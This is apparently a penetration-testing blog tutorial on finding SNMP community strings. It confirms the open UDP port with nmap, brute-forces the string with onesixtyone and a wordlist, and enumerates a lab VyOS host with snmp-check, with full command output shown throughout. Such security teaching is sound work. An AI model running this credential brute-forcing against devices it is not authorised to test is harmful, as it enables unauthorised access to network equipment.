Discovering SNMP community strings can be challenging, but the Onesixtyone tool makes this process straightforward and efficient.
If you’re looking to identify SNMP community strings on network devices, you’ve come to the right place. The Onesixtyone tool leverages try and error techniques to systematically test and retrieve SNMP community strings, making it an essential utility for security professionals or penetration testers.
In this comprehensive guide, I’ll walk you through exactly how to use the Onesixtyone tool to find SNMP community strings, with practical examples and best practices to help you master this powerful network assessment tool.
First let’s discuss some general topics like,
What is SNMP?
SNMP fullform is Simple Network Management Protocol and that is used for interchanging or exchanging management information between different network devices. SNMP allows an administrator to gather information about the host on which SNMP service is running. It is also possible to modify the information.
What is an SNMP Community String?
The “SNMP Community string” is like user id and password that allows router’s to access other router’s statistics data. IPCheck Server Monitor sends the community string along with all SNMP requests. If the community string data is correct, the device responds with the requested information. If the community string is incorrect, the device simply discards the request and does not respond.
Important: SNMP Community strings are used only by those devices which support SNMP v1 and SNMP v2c protocol. The SNMP v3 uses the username and password authentication, along with an encryption key. Most SNMP v1 and v2c devices are set to default from the factory with a read-only community string set to “public“.
How to Find SNMP Community String?
One can find the SNMP Community String using a tool called Onesixtyone. Onesixtyone will use a word list provided by the user and brute force the SNMP service. Please follow the steps in this SNMP Pentest article.
Most SNMP v1 and v2c devices are set to default from the factory with a read-only community string set to “public“. But it is a standard practice for network managers to change all the community strings to customized values in the device setup. So if you want to Pentest the SNMP service, then you have to find the community string first.
Here I have set up an SNMP Penetration testing lab setup with Vyos VM. I will explain to you the full process step by step using the POCs and examples.
Steps to Find SNMP Community String
First of all, confirm the SNMP service is up and the SNMP port UDP/161 is open. Use the following command for the same, Here I am using the Nmap tool to confirm.
$ nmap 192.168.43.161 -Pn -sU -p161
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-20 20:19 IST
Nmap scan report for 192.168.43.161
Host is up (0.00025s latency).
PORT STATE SERVICE
161/udp open snmp
MAC Address: 08:00:27:7B:8C:EB (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds
Observe that the UDP port 161 is open, which means the SNMP service is up. We can proceed further for the pentest.
Here we have an host 192.168.43.161 with SNMP service. We know that an unconfigure or a default configured SNMP service has “public” as community string value.
Let’s try if we access the SNMP service with “public” community string. I will use snmp-check tool for confirmation.
$ snmp-check 192.168.43.161 -c public
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 192.168.43.161:161 using SNMPv1 and community 'public'
[!] 192.168.43.161:161 SNMP request timeout
Observe that we got the error “SNMP request timeout” means, the specific host’s SNMP service has any custom community string. So, we can not access the service with “public” community string. We have to find the community string.
We will use a tool called “onesixtyone” for bruteforce the community string. onesixtyone tool needs a wordlist of the multiple and possible community strings. You can download the SNMP community strings wordlist from this SNMP Community Strings Wordlist GitHub repository.
This is onesixtyone help text.
$ onesixtyone -h
onesixtyone 0.3.3 [options]
-c <communityfile> file with community names to try
-i <inputfile> file with target hosts
-o <outputfile> output log
-p specify an alternate destination SNMP port
-d debug mode, use twice for more information
-s short mode, only print IP addresses
-w n wait n milliseconds (1/1000 of a second) between sending packets (default 10)
-q quiet mode, do not print log to stdout, use with -l
host is either an IPv4 address or an IPv4 address and a netmask
default community names are: public private
Max number of hosts : 65535
Max community length: 32
Max number of communities: 16384
examples: onesixtyone 192.168.4.0/24 public
onesixtyone -c dict.txt -i hosts -o my.log -w 100
Now, we will use onesixtyone tool to bruteforce the service with the wordlist.
$ onesixtyone -c snmp_community_strings_wordlist_onesixtyone.txt -p 161 192.168.43.161
Scanning 1 hosts, 3221 communities
192.168.43.161 [admin] VyOS 1.2-snapshot-2019Q4
Here, -c flag is to specify the wordlist, -p is to specify the port on which the SNMP service is running on the remote host, and then the IP address.
Observe the results, We found the SNMP Community String for the remote host, and that is “admin“. onesixtyone tool brute-forced the remote host and identified the community string.
We can confirm the community string “admin” with snmp-check tool.
$ snmp-check 192.168.43.161 -c admin
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 192.168.43.161:161 using SNMPv1 and community 'admin'
[*] System information:
Host IP address : 192.168.43.161
Hostname : vyos
Description : VyOS 1.2-snapshot-2019Q4
Contact : root
Location : Unknown
Uptime snmp : 04:56:51.36
Uptime system : 02:25:53.89
System date : 2020-9-20 21:57:25.0
[*] Network information:
IP forwarding enabled : yes
Default TTL : 64
TCP segments received : 2030
TCP segments sent : 2030
TCP segments retrans : 0
Input datagrams : 7697
Delivered datagrams : 7693
Output datagrams : 4458
[*] Network interfaces:
Interface : [ up ] lo
Id : 1
Mac Address : :::::
Type : softwareLoopback
Speed : 10 Mbps
MTU : 65536
In octets : 214966
Out octets : 214966
Interface : [ up ] Intel Corporation 82540EM Gigabit Ethernet Controller
Id : 2
Mac Address : 08:00:27:7b:8c:eb
Type : ethernet-csmacd
Speed : 1000 Mbps
MTU : 1500
In octets : 535035
Out octets : 125078
[*] Network IP:
Id IP Address Netmask Broadcast
1 127.0.0.1 255.0.0.0 0
2 192.168.43.161 255.255.255.0 1
[*] Routing information:
Destination Next hop Mask Metric
0.0.0.0 192.168.43.1 0.0.0.0 1
192.168.43.0 0.0.0.0 255.255.255.0 0
Observe that the snmp-check enumerated the SNMP service successfully. This means the community string “admin” is right. So this way we can find the community string.
